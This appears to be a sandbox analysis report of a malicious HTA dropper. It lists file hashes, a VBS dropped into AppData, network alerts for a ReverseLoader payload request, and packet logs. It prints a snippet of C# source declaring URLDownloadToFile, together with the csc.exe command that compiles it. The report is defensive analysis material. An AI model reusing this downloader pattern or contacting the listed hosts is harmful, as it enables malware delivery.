SSDEEP:	24:32gSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKM9r8Hd:GgSU4xymI4RfoUeW+mZ9tK8NF9u
MD5:	401E1D39FA1D53B1B16E95A7F25BC67A
SHA1:	06B6F24CDEA0923ECD7F85FF299C0DC20DF7F26C
SHA-256:	9CD66A79D880FE51E34B91D0730704CEF58F4C94ACB18B53E575C22A0651CC17
SHA-512:	DBA48F550BEAEBD49049BFB92A79AADC82822ECEEB7E0ED585DFC0E61A5F7E8FC9380DE4B273B422B868909A0EE049DD7E28DD89C73DEC8D8BCD024C28C0598B
Malicious:	false
Preview:	@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RESA4B4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 20 16:53:23 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.960486850065025
Encrypted:	false
SSDEEP:	24:Hwe9EuZfKczwKduXDfHiwKEbsmfII+ycuZhNDkakSqpPNnqSqd:NBNduzZKPmg1ulDka3qLqSK
MD5:	BACB3CEBB5568EE8299FDA60F58D4FC8
SHA1:	380BE6045A5B7A8EC558D7707CE93D4FEF2E5BD8
SHA-256:	DD8A9F2CA5B7B1985E58299153816795C1F6B64C724F681978F5487B1ECA117E
SHA-512:	787DF6275CD3EC5B31E43B15A692D058C9FDB1C1BFF8DF3AB457E3712315B2855B35D97597299FBE8C7046CCE4C5DA094110BCFA55D8854CF791C19806D3D770
Malicious:	false
Preview:	L.....eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP.................%.w.E.......`...........4.......C:\Users\user\AppData\Local\Temp\RESA4B4.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.0.w.a.e.i.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5whgs0o.44f.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anngzjj4.lmz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjvukf3k.nju.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g02bl1ve.su3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1rxrwjp.r5z.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfn51xzo.upu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0845786207986894
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZkak7YnqqqpPN5Dlq5J:+RI+ycuZhNDkakSqpPNnqX
MD5:	8A25A977A745E3128F09ACC2800460B4
SHA1:	50C177CEB38D15344DB0798C6579D1BFC9D5E614
SHA-256:	B2A875D99E7DA5F2A95D14133307A250C70AE3A02EAE6C6F62A379613500D832
SHA-512:	5465E00287F09DE05005083F7BE17C41E5A59F543D35A5B90D8A9294D9FE3C1505271FF5C07C0503799CB4B7F6D2EAA21EF0644406A0E96D0475E06B8AE9E7C3
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.0.w.a.e.i.5.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.0.w.a.e.i.5.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
Category:	dropped
Size (bytes):	485
Entropy (8bit):	3.767987989312585
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zu0eJ48GHdMGpLFJQXReKJ8SRHy4HGmm6Kmxj/HOvHQy:V/DTLDfuzJiXkXfHSDCOvwy
MD5:	B35AE42C67AC0DE0078975C9C8744C14
SHA1:	F85C1973CDF038AD851324C9C021D6B7CDB1DB28
SHA-256:	3C45043D7AE00B5A57D1C20A68CBF81FE37151ED53E2ECD11A7D87CA4CEC6442
SHA-512:	52E314313CAB6577AD9592120009A35B61B2B00D2452EBD627CF5CD7D6E1DFE9CC94CB5DFA5B306867F6823F60BDFFE24214B53BA1FC379C10E2908795BF05C5
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace uzFTrFEl.{. public class TVAiTYxp. {. [DllImport("urLMOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr JZdPaFMDEyL,string BPsFsbSQ,string rz,uint eYhY,IntPtr hFbCd);.. }..}.

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.216039353107685
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fwoFqzxs7+AEszIwkn23fwoFP:p37Lvkmb6KRfcWZEif5
MD5:	6CB52572DE8F3893EE10822499C854C1
SHA1:	5061C9A646F25A5B88338C4ABD1FE75826F56950
SHA-256:	79280A24B665ABCDD7F5FFDB469A8FFC02677DBA235B0352E8EE7FE706CD0D50
SHA-512:	5B0CB34FD75B04E9C05B79A66B1B1E82A0DEBC2D48F88DEB21DB34E76527A33B6D51863DC05E1D0683DA1CE8944F7DD2EFE88B228E460E6984BDD84BC45A94D3
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.0.cs"

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.827602597556726
Encrypted:	false
SSDEEP:	48:6zFskr+aU8Spq2KJCYbCZX1ulDka3qLq:cji3temK
MD5:	58F780341281109A61AECA3B7FC8BABF
SHA1:	C109961D6A1A866A9BB7A2DCF1E1956A55E78C04
SHA-256:	A300551395F06E2546874C0642DAB84A07D5E71D857E4B1D06B393FF4D25AA9D
SHA-512:	9C0028F317E23D2779A9932E45EC7D696A1890E7417E1C6B7DF84C9478FFE5166CC45094397448EE5FEB9D227F8D3972CAE9A8177FE79413E618B784F35F066C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....{.....{........................... .............. @.....P ......R.........X.....d.....m.....p.....u...R.....R...!.R.....R.......!............@.......................................)..........<Module>.e0

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category:	modified
Size (bytes):	867
Entropy (8bit):	5.30258773609174
Encrypted:	false
SSDEEP:	24:KJBqd3ka6KRfNEif8Kax5DqBVKVrdFAMBJTH:Cika6CNEu8K2DcVKdBJj
MD5:	2F9D12FC0A860DB0138250AA83C0DA03
SHA1:	17CD73013B9569CB6337DF6AEBA646A2915BDFBE
SHA-256:	52160B586CDB53CFC8BD5F2DC311FC42A51951AF2E4D1136B0B9B4092C982CEC
SHA-512:	322D03865970D4291F36934785E99835059B83509E41CEEF40569DDC1FFAC77EA947086246FD07229F119DB9641FE04ABDBC1ACDB6833BFC7652DB067896491C
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11857), with CRLF line terminators
Category:	dropped
Size (bytes):	217490
Entropy (8bit):	5.23324819870069
Encrypted:	false
SSDEEP:	3072:A8gVmI3b0mgfmWu+le9VOv5iG5sVhQ30Wk+70wgA1A:A8gV6e9VOvM
MD5:	7F54FCC18CF1595A91BCF1C61DF774CF
SHA1:	298FAE69662E298AC46E0E1BE5FC679A0F527C22
SHA-256:	891E95AA7D15515DF54F91606A27711C7C6BCE4BE800F6317E5F58843B0ECFB7
SHA-512:	3C368045EBE048EE7E8972E6DCAF92F60772C75A1A2D5CDAAE7E6048AAC8B7CB8FD266C6632B9B7FF17598162600BA517A71B4C9B90D564E0E7C4EBE193ED3BA
Malicious:	true
Preview:	Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (15679), with CRLF line terminators
Entropy (8bit):	2.103432366649896
TrID:	HyperText Markup Language (15015/1) 100.00%
File name:	mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
File size:	15'848 bytes
MD5:	4d74c4d1eddb79b92e94ef09f3437eaa
SHA1:	f7add01e161ef9b7093cf672afe052648dd457da
SHA256:	96df1f20a2f78ef6665f8acdf0e9576ac4f7879ec61f5e90d1fcb2ecbb310281
SHA512:	bf4616e208b0b17c382df381eacaf3bccce0bb70311ca730a6316881cbe3b2f81494ec99e32d4dc8546556dbb487b9f3ac5b836c04e34d343053358a601a36f3
SSDEEP:	48:3EsYcJaFxYcJeMilzHIM7py4U2b6poz10daCa/bfUTTiuYcJFAVOPG:0LfgtlzF82bPpTTxg+
TLSH:	576297060F52FE88D348573698EDA9D231BFE3B896652EC7344C1545AB86B5408EE3C7
File Content Preview:	<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRIpT tyPe="tEXT/VbScrIpt">..DIm..............................................................................................................................

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T16:34:50.825261+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.4	49730	57.129.55.225	80	TCP
2024-12-20T16:35:02.899292+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	151.101.1.137	443	192.168.2.4	49731	TCP
2024-12-20T16:35:24.579022+0100	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.4	49738	104.21.84.67	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:34:49.440243006 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:49.559894085 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:49.560003996 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:49.560199022 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:49.679655075 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825153112 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825261116 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.825308084 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825321913 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825351954 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.825387955 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.825640917 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825655937 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825668097 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.825722933 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.825722933 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.826101065 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.826113939 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.826127052 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.826139927 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.826164961 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.826196909 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.944963932 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.945102930 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.945141077 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.945240021 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:50.949431896 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:50.949573040 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.018060923 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.018146992 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.018212080 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.018212080 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.020333052 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.020540953 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.020879030 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.020940065 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.028652906 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.028841972 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.028862953 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.028913975 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.037076950 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.037172079 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.037293911 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.037354946 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.045344114 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.045475006 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.045506954 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.045574903 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.053812981 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.053827047 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.053905010 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.062102079 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.062197924 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.062275887 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.062598944 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.070475101 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.070599079 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.070656061 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.070656061 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.079629898 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.079642057 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.079674006 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.079715014 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.087516069 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.087567091 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.087959051 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.088227987 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.094903946 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.095185995 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.095392942 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.095607996 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.137978077 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.138273954 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.138299942 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.138780117 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.141957045 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.142019987 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.212088108 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.212337017 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.212582111 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.214514971 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.214579105 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.214657068 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.214731932 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.219069004 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.219144106 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.219261885 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.219341040 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.223794937 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.223809004 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.223911047 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.228540897 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.228663921 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.229266882 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.229341984 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.233203888 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.233311892 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.233375072 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.233460903 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.237756968 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.237864017 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.237981081 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.238037109 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.242607117 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.242620945 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.242758036 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.247004986 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.247282028 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.247289896 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.247354984 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.252073050 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.252144098 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.252341986 CET	80	49730	57.129.55.225	192.168.2.4
Dec 20, 2024 16:34:51.252638102 CET	49730	80	192.168.2.4	57.129.55.225
Dec 20, 2024 16:34:51.256943941 CET	80	49730	57.129.55.225	192.168.2.4
